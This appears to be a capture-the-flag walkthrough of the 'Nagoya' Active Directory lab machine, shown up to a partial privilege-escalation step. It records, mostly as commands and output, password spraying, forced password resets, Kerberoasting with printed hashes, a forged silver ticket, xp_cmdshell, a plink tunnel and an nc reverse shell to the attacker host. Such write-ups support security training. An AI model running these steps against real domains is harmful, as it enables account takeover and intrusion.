Machine Information
- Machine Name: Nagoya
- Machine Difficulty: Hard
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
Nmap scan report for 192.168.188.21
Host is up, received user-set (0.021s latency).
Scanned at 2024-10-18 11:17:21 +08 for 196s
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: 9200225B96881264E6481C77D69C622C
|_http-title: Nagoya Industries - Nagoya
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-18 03:18:56Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2024-10-18T03:20:36+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: NAGOYA-IND
| NetBIOS_Domain_Name: NAGOYA-IND
| NetBIOS_Computer_Name: NAGOYA
| DNS_Domain_Name: nagoya-industries.com
| DNS_Computer_Name: nagoya.nagoya-industries.com
| DNS_Tree_Name: nagoya-industries.com
| Product_Version: 10.0.17763
|_ System_Time: 2024-10-18T03:19:56+00:00
| ssl-cert: Subject: commonName=nagoya.nagoya-industries.com
| Issuer: commonName=nagoya.nagoya-industries.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-01T01:46:30
| Not valid after: 2025-01-31T01:46:30
| MD5: 21dd:ee05:f731:db23:c7aa:082b:c258:7fe0
| SHA-1: 62cd:9159:e060:0cc5:4a2a:a278:214b:97d5:04df:0598
| -----BEGIN CERTIFICATE-----
| MIIC/DCCAeSgAwIBAgIQGMt7yxY4+bZMMZohDSgPazANBgkqhkiG9w0BAQsFADAn
| MSUwIwYDVQQDExxuYWdveWEubmFnb3lhLWluZHVzdHJpZXMuY29tMB4XDTI0MDgw
| MTAxNDYzMFoXDTI1MDEzMTAxNDYzMFowJzElMCMGA1UEAxMcbmFnb3lhLm5hZ295
| YS1pbmR1c3RyaWVzLmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
| ANtE+B3NmlB84Oz1ErytcTRnOM+851YeRfHPUZB2KIlrEUGjBmv5TREeu3DSZWkN
| 9jDTylL0Kc+TtYy81WTBnnIaoP+TWnT4AGCUnjnic8fqDrJD9cGwmJL+NuGm6Zll
| l/gfN+QmxUEee+AYY2wRFt+Yz38gYhrX01dif7xCIgrHTYvWlOVW8LAow0eVi/+G
| q+EuJGem6Cg/XFPRTo/UrWrLQjgDp7JtFWAyKm2NEBIudwz6hkEGBrn+bB538C+q
| zLT1yqTDqjeLTQnYFYVvXP1LhjIZpqrBDyUPs4iLImzqUVrejbpRa+eCA28ZmrBa
| x5O1H+4IsU1CNs9Uq4uuBNkCAwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEw
| CwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEBCwUAA4IBAQAxiSTIuo1jJ8wK7x0lMaf/
| qih+Au2jjQcMoWQSPHxsnss1g1PYUvqRTQxAYbWqFRS6IQ/rg5epFWKlZ6oTb0uk
| gXm190NCzrP0UOoNgkKr8YF+u/8lwLK647W+mlyJ4zL6LhpFG3tKQrWMUi3BYD7X
| ZFd0qSk6Bf0Ec0dX4NW4pLEnWuw38T697FEHTrINbXby+ZKHtoL+TKhCnj7gRa4U
| LR2WqZ5Q1katKXh61P+YDWpMWnT9DXdNnXnDV2OkFe4KkODaNu+2/C5mjytQe6id
| zDdv/GpiyD/0/w11jp5BdhQMCNuy8DZDT/CMgXzErgVfubOPVNQOHhW/qsxuiz91
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49693/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49708/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
There’s a lot of ports opened but I’ll start with the web port.
Port 80
I started out by looking around the website and also searching for potential directories.
After going through some times, I noticed that there’s a page where it provide a lot of first name and last name.
Other than this, I could not find anything else. I then started to combine the first name and last name into username such as firstname.lastname.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
cat user
Matthew.Harrison
Emma.Miah
Rebecca.Bell
Scott.Gardner
Terry.Edwards
Holly.Matthews
Anne.Jenkins
Brett.Naylor
Melissa.Mitchell
Craig.Carr
Fiona.Clark
Patrick.Martin
Kate.Watson
Kirsty.Norris
Andrea.Hayes
Abigail.Hughes
Melanie.Watson
Frances.Ward
Sylvia.King
Wayne.Hartley
Iain.White
Joanna.Wood
Bethan.Webster
Elaine.Brady
Christopher.Lewis
Megan.Johnson
Damien.Chapman
Joanne.Lewis
Although I now have potential username, I do not have any password to perform brute force attack. I tried to use rockyot.txt but it does not work. I then try to get some password using the words in the website such as Nagoya.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
netexec smb 192.168.188.21 -u user -p "Nagoya2023"
SMB 192.168.188.21 445 NAGOYA [*] Windows 10 / Server 2019 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False)
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Matthew.Harrison:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Emma.Miah:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Rebecca.Bell:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Scott.Gardner:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Terry.Edwards:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Holly.Matthews:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Anne.Jenkins:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Brett.Naylor:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Melissa.Mitchell:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Craig.Carr:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Fiona.Clark:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Patrick.Martin:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Kate.Watson:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Kirsty.Norris:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [+] nagoya-industries.com\Andrea.Hayes:Nagoya2023
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
netexec ldap 192.168.188.21 -d 'nagoya-industries.com' -u user -p "Nagoya2023"
SMB 192.168.188.21 445 NAGOYA [*] Windows 10 / Server 2019 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False)
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Matthew.Harrison:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Emma.Miah:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Rebecca.Bell:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Scott.Gardner:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Terry.Edwards:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Holly.Matthews:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Anne.Jenkins:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Brett.Naylor:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Melissa.Mitchell:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Craig.Carr:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Fiona.Clark:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Patrick.Martin:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Kate.Watson:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Kirsty.Norris:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [+] nagoya-industries.com\Andrea.Hayes:Nagoya2023
After guessing different password, I managed to get a user that able to access SMB and ldap.
Port 135
Since I could access ldap, I tried to run bloodhound-python to have a quick overview about the active directory. Remeber to add the needed domain into /etc/hosts first.
1
192.168.188.21 nagoya-industries.com nagoya.nagoya-industries.com
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bloodhound-python -d 'nagoya-industries.com' -u 'Andrea.Hayes' -p 'Nagoya2023' -ns 192.168.188.21 -c All --zip
INFO: Found AD domain: nagoya-industries.com
INFO: Getting TGT for user
INFO: Connecting to LDAP server: nagoya.nagoya-industries.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: nagoya.nagoya-industries.com
INFO: Found 36 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: nagoya.nagoya-industries.com
INFO: Done in 00M 05S
INFO: Compressing output into 20241018114657_bloodhound.zip
After this is complete, I import the data into bloodhound and have a look.
Since I have a user credentials, I tried to see if it possible to get a member of HELPDESK as the member of HELPDESK has more permission.
1
net rpc password "Iain.White" "P@ssw0rd" -U "nagoya-industries.com"/"Andrea.Hayes"%"Nagoya2023" -S "nagoya.nagoya-industries.com"
Since there’s no error message, I think it successfully executed. Now I try to check if I have access to the user using netexec.
1
2
3
netexec ldap 192.168.188.21 -d 'nagoya-industries.com' -u Iain.White -p "P@ssw0rd"
SMB 192.168.188.21 445 NAGOYA [*] Windows 10 / Server 2019 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False)
LDAP 192.168.188.21 389 NAGOYA [+] nagoya-industries.com\Iain.White:P@ssw0rd
I have successfully change the password accordingly. Since I have a member of HELPDESK I tried to see if I could edit the credential of Christopher.Lewis using the same method.
1
net rpc password "Christopher.Lewis" "P@ssw0rd" -U "nagoya-industries.com"/"Iain.White"%"P@ssw0rd" -S "nagoya.nagoya-industries.com"
Alright, It seems like I could change the password again. Now that I have changed the password of Christopher.Lewis, I should be able to get a shell according to bloodhound.
Port 5985
1
2
3
netexec winrm 192.168.188.21 -u christopher.lewis -p 'P@ssw0rd'
WINRM 192.168.188.21 5985 NAGOYA [*] Windows 10 / Server 2019 Build 17763 (name:NAGOYA) (domain:nagoya-industries.com)
WINRM 192.168.188.21 5985 NAGOYA [+] nagoya-industries.com\christopher.lewis:P@ssw0rd (Pwn3d!)
Yeap it works accordingly. It seems like I could get a shell with winrm.
1
2
3
4
5
6
7
8
9
10
11
12
evil-winrm -i 192.168.188.21 -u christopher.lewis -p 'P@ssw0rd'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> whoami
nagoya-ind\christopher.lewis
Now that I have shell but not administrator account, it’s time to privilege escalation.
Privilege Escalation.
As usual, I started out using winpeas first. Here’s some interesting information from the result.
1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> netstat -ano | findstr "TCP"
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 628
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 880
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 628
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 628
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 880
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 628
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 4372
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 628
It seems like it has a port 1433 listening but the port is not available for me according to nmap result. I then tried to perform port forwarding to check the port.
1
2
3
4
5
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> echo y | .\plink.exe -ssh -l root -pw <passhere> -N -R 1433:127.0.0.1:1433 192.168.45.221
plink.exe : The host key is not cached for this server:
+ CategoryInfo : NotSpecified: (The host key is...or this server::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
192.168.45.221 (port 22)You have no guarantee that the server is the computer youthink it is.The server's ssh-ed25519 key fingerprint is: ssh-ed25519 255 SHA256:f5uu0qIl1ojNEKoHnnBY834sDdVtjaLV0bvfFFYyGAUIf you trust this host, enter "y" to add the key to Plink'scache and carry on connecting.If you want to carry on connecting just once, without addingthe key to the cache, enter "n".If you do not trust this host, press Return to abandon theconnection.Store key in cache? (y/n, Return cancels connection, i for more info) Using username "root".
1
2
3
4
5
6
7
8
9
10
nmap localhost -p 1433
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-18 13:06 +08
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000074s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
1433/tcp open ms-sql-s
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
I tried access using my current user but I could not execute any command so I decided to check on other user. I then try to perform keberoasting attacks to check if there’s any potential user.
1
2
3
4
5
6
7
8
9
10
11
12
13
impacket-GetUserSPNs nagoya-industries.com/Christopher.Lewis:'P@ssw0rd' -dc-ip 192.168.188.21 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------------- ------------ ------------------------------------------------ -------------------------- -------------------------- ----------
http/nagoya.nagoya-industries.com svc_helpdesk CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com 2023-04-30 15:31:06.190955 <never>
MSSQL/nagoya.nagoya-industries.com svc_mssql 2023-04-30 15:45:33.288595 2024-08-02 09:48:41.441299
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_helpdesk$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_helpdesk*$69e1764862e6f152b7ebed16e27cdba6$574e1e203c1e6e3206df077330b1a25f97b417d9cfa59f1e0f8199aceaefe83bba7039c1d633885ebdda5faa8db8d6fcab1b3f989d2660c76d5325a9236206c29b40d3750b0e7d5bec685848f69127cfe47872d17b0fd3531e67a1e0ffe45196767e3dbf374a81ecb0166d3ed03430d52abae43caef3db61f314b864b06200ce9e4eecf74d94901040347f520c8c2058be8ae714578aa561b7b84f913c3a1b06ca53aee23a9bda7b53d485b115607455d9f47346d287bbd16d825cdb291c0003933cb0458d1e40b34be4eb46b01946d03eb2bacc49149ee5972c6a1f9a7cc35090104a1ce470e1fd17f524285626dea834212d0288af437087f428a74111b3422653f64e020c5b9416e4f3f342e46ba2c9759c5cbe3c18f9d4a94ff5ad2f171944035c93618cc34dcdb367d52fd07d508363ef8eff8cc147e0c3e46335dbf9390ff8de0d805f920387c020a121a34b7b6f04d984fbec4fe2e50b40c206e10c34e48499d8245bfc265fa31326084679c9258e68e8569c778c98c6ee5e00d8cd5284f1d3ea3c68aa3b20606b363bf310897dc83062cbf36b33b2ca7a560cf84098c0d5d6ca5b543c472ca51f337e283c4dbda637a4d9a88c5bdd12530feb5d68459dcbcc5371bd1d0f133bfc4280f5c28cf66feb5673e65c8f4997204ec7c403eb29e7cbc4fbf4e4ecfef998025645eea28a85392b3c55d14b4a21b617a849df04c2a0f334bfc17b6a4cfa04cc999bfba757128a09e18787bd94d122aff29eded090882d598403a57f364faa9ee33d1e57ceb8d2fdafd24db0703594f3a1614ccce914e5fa70d9bce81f675c7c774232ad97ee8c332276f144a88274a84dd77977d6cc3eb4a9d6636fe97207dd92c6f90d631f583c89fe71b63cce33bca8a496c9ca54b23ef8c2d5119f87d2f16d498e771f3efa71934129f715330bd9b93d23c660c45cfc7ebacea12576624e9dab34d1b0c2be802f1e013bda1899e9e04653f9a5c77798d4a7817ad1cfbf0bf5fc4af3bc6837180279f859fc921c99c3830c3c35faee8981bbf7b8942cfc9578d2569f4515963f401119bd8c9122dc9f9630bdaa5473cc898faf5a6d9fe7ff10bf4a7c0c21680e0528d05d770f5c935edab21abc2aff20c9ae0e4a497129caad0d8801df2aafac393e38cb9c42c6543168c7e36e5d0a5ee0ab3727e313b36bd6217bee500547ebe80b711ceaca2bcf5e3a0dbc07fe5f01d27c4d99a53c5198e1a1b4d0b71dc2a36f3458a5f6ebd8c64af3306e0cfdf47e8e675ba865bd71022997cadf412b071c2ed6bee14d07d6cd863249d0f68ed2dad0f2a40bd091ca5f9eef2329615a1c4b5d391d394d33f976481fd56f0ff71b3f181b1f2c727ba628a1130bad86a9ea240912b27feb1f49e43c361c1540c50cd9acb49035c39de9984516e7548925d5b4f64efde63c75c368cd5cbdb1018127842bb8f68fc7ec6c0727280072c3384d0f2239be842db085542030718eed159ac315c3600fd7539ad9fa714ace62b69acf1bfd35f5e4b56f36e15aa2419f5179ca712deda7cf542f80df6671720dfa81e91e7a2e80110024dbc1287b889439aa7b52c52c612223ed5ebe73ab7248e7c0060a81d0fa87029b6efa251bb4d69780b71d1b7c4e338ec2c6dc3791f421d20d47c2d95bd9fd19c1ec046ad012955b89fa33455542568a59b1f974a64c9fc7f292de69d8f81591ed0f025dbc91e65845f27987be5d741be356edf90e
$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*$1d2d5595fc500af0fee66cee0445cb2d$28e31e8baf2fc1754dcf9d423b631e1d1087d8e11efbc330049721bd323d1f8a5bb747d27f726043885d95d5587f19274549bb44ab5d96fc3c76d09338a3b12678c9a6e628ca91ef0beae6ea780e9d095fa2c21106b975ed86f7c37790279aa91fcea6be9afbc1ac8ba087e59216eb5b8cf3df7ee824258552c23bc4b50079d59563b804e37ffcdd195f6c9f70eeab4341df5d35ca140cd5bc5917354d64d1dae37cfc5e9fa1ae22b751a0723d82ddf99ad9ed3741e0ee44a2fa389bb2ecf153f90695b449e7b014f848401912e38b041ad1a2fc7924e933dfc1746a06c64eb79d83421bd246705d0b8482d5492d38d6186d0df53b9d29ee3085dfad0115231e2a1787606a4917109efd141eedf08e7e9ed7a898e309fdd2c6b99ebff9b800fbc56cd63bcf30133ac6a39a7c95a9c3aecac8839699104e15bd720f55ae87ab3b2ccc730af457ad07e8cb10dceb3cca310b2b0319d5a9aec114c01417f6039f30dc4b12caac8df486c0d51122e5074504a8be58c96c6dc217a8156b959fe6e26f03ee40aa697d353822cd4000382597bab06ba1d8767591ab23ca81986722e4f7d3ada1729c850f269b5d02ee726b818b01ca48e7b7f056f27211f0358545c07a17df5549401e2b112622da67461fb05e56d1f980373fcbd6b0643bc42a1bdae5fc5976eeac62f53e7fa202b5eb3865a98a12db2bac25b05d67caade0241f9ae00048b1a7a2aaae152a98f672fce603c64ce448dc2b1201c85ec57e3e779ba7b2b8964629c72f96d30a558706a9cb1134f2528abcd456962acec28b80dc8457715efed5eaff0a0f25753b9239561bb1b3374d4583ca810a398dbc1bb5b454c96a036dc886024ba8dce81148cdef7a8e4a226062d41c41de46e9a270e8b900024d17bafa92e750cc29481c7f997456c1550d7200bfd01061b1956b56e8ba6c901e10109f8689bf8bf0dce7a8ff96374b88dd432d2b6dfeec8d4b404a4a3bfa423bae0f830666b7833bfde03c84b0494a920170f9e3e2bc41799c12cdc8d4aad22abc029c0d972eb45e7bf31d88a4157cf5fc012312c81d85dbb532d4b2832d2936c0b68300cc15ef7b65dc4cf097b0d3ea1d03bc4c1428a49deebb5d09338b7895fa4b4bd2a89aa653cc34d1f3eea38d7aa6a4db7411c799c3e2ce4cd05694761dd3cab5400f38a0537762fe1d747e2b543ba13ed2b7943fee4a77a1d44c3b5fabd06e6b32907b07b3a60a7d6f66343b3dcf316f5c2003273b6eb0b4bc04076ac1e6864203fff9a394ec2038bf8a30eaada49672db053aab7ada131d0203e576bfb2eb9df768d4c5d42de7926b0ddfd49e9341412a9bbe73d58675af95e52ccf0c1cdb155eea5cc945187f893e4f436e96856acea7025a0da3064c86d8f241ecebe0ec4d09ae9bb55f770ca273a94bb6597bdb4998a5e3bae5ef3459b3c174aad8148bb556858f1fff550d7776d45fad5b8a3d916bc32d4183f5ab24a7e197e607c9919bf517f63c3400bbc4823956b6ed820f025e608c14efbf9fc4b6377335de144053d0df7c4e2bd83563d6504f9cf023908487c1718799d7c43ea57df6b7ff0cc738389c450624baed5faa5a082bdfd106d7c78689374f38a3ead2b52dde2a359ebcb3c7ebb1714cfa4ab644727b157608f9cdc4a7fd9b6094a614c008bfe190b80d515e8f90699f8a5a8d5f7707d1d17509338121deba3e0bfb6180b184b86e61dab9a84e963c39a30e4b8a36db
I then copy the hash and try to crack for potential password.
1
2
3
4
5
6
7
8
9
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Service1 (?)
1g 0:00:00:01 DONE (2024-10-18 13:20) 0.9803g/s 1020Kp/s 1020Kc/s 1020KC/s Sonne0211..Sandy1988
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Since I have the password, I tried to access the mssql and hope to execute command but no hope. I then notied this article where it talks about Silver Ticket Attack. I then decided to perform silver ticket attack as it seems like I could get some extra permission by impersonating other user. To perform silver ticket attack, I’ll need to gather some information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> get-addomain
AllowedDNSSuffixes : {}
ChildDomains : {}
ComputersContainer : CN=Computers,DC=nagoya-industries,DC=com
DeletedObjectsContainer : CN=Deleted Objects,DC=nagoya-industries,DC=com
DistinguishedName : DC=nagoya-industries,DC=com
DNSRoot : nagoya-industries.com
DomainControllersContainer : OU=Domain Controllers,DC=nagoya-industries,DC=com
DomainMode : Windows2016Domain
DomainSID : S-1-5-21-1969309164-1513403977-1686805993
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=nagoya-industries,DC=com
Forest : nagoya-industries.com
InfrastructureMaster : nagoya.nagoya-industries.com
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=nagoya-industries,DC=com}
LostAndFoundContainer : CN=LostAndFound,DC=nagoya-industries,DC=com
ManagedBy :
Name : nagoya-industries
NetBIOSName : NAGOYA-IND
ObjectClass : domainDNS
ObjectGUID : 1153c877-efa1-443b-b59f-c32c9286750e
ParentDomain :
PDCEmulator : nagoya.nagoya-industries.com
PublicKeyRequiredPasswordRolling : True
QuotasContainer : CN=NTDS Quotas,DC=nagoya-industries,DC=com
ReadOnlyReplicaDirectoryServers : {}
ReplicaDirectoryServers : {nagoya.nagoya-industries.com}
RIDMaster : nagoya.nagoya-industries.com
SubordinateReferences : {DC=ForestDnsZones,DC=nagoya-industries,DC=com, DC=DomainDnsZones,DC=nagoya-industries,DC=com, CN=Configuration,DC=nagoya-industries,DC=com}
SystemsContainer : CN=System,DC=nagoya-industries,DC=com
UsersContainer : CN=Users,DC=nagoya-industries,DC=com
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> Get-ADUser -Filter {SamAccountName -eq "svc_mssql"} -Properties ServicePrincipalNames
DistinguishedName : CN=svc_mssql,CN=Users,DC=nagoya-industries,DC=com
Enabled : True
GivenName : svc_mssql
Name : svc_mssql
ObjectClass : user
ObjectGUID : df7dda21-173f-4a4a-88ed-70d69481b46e
SamAccountName : svc_mssql
ServicePrincipalNames : {MSSQL/nagoya.nagoya-industries.com}
SID : S-1-5-21-1969309164-1513403977-1686805993-1136
Surname :
UserPrincipalName : svc_mssql@nagoya-industries.com
After gathering the Domain-SID and SPN, I could forge a silver ticket. The NT hash could be generated using this link.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com -user-id 500 Administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for nagoya-industries.com/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
After the ticket is created, add it into this variable KRB5CCNAME.
1
export KRB5CCNAME=$PWD/Administrator.ccache
After everything is done, make sure to add the domain to 127.0.0.1 as well as the port 1433 is port forwarded to local and I’ll need to redirect it to my localhost as well.
1
2
3
cat /etc/hosts
127.0.0.1 nagoya-industries.com nagoya.nagoya-industries.com
192.168.188.21 nagoya-industries.com nagoya.nagoya-industries.com
After everything is setted, I should be able to access the port 1433 as administrator with the ticket.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
impacket-mssqlclient -k nagoya.nagoya-industries.com
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (NAGOYA-IND\Administrator dbo@master)> enable_xp_cmdshell
[*] INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
I could finally perform command execution in the mssql services. I then quickly get a reverse shell by uploading a nc.exe.
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.221] from (UNKNOWN) [192.168.188.21] 50068
Microsoft Windows [Version 10.0.17763.4252]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nagoya-ind\svc_mssql
Now that I have another user, it’s time to perform privilege escalation again to see what permission current user has.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
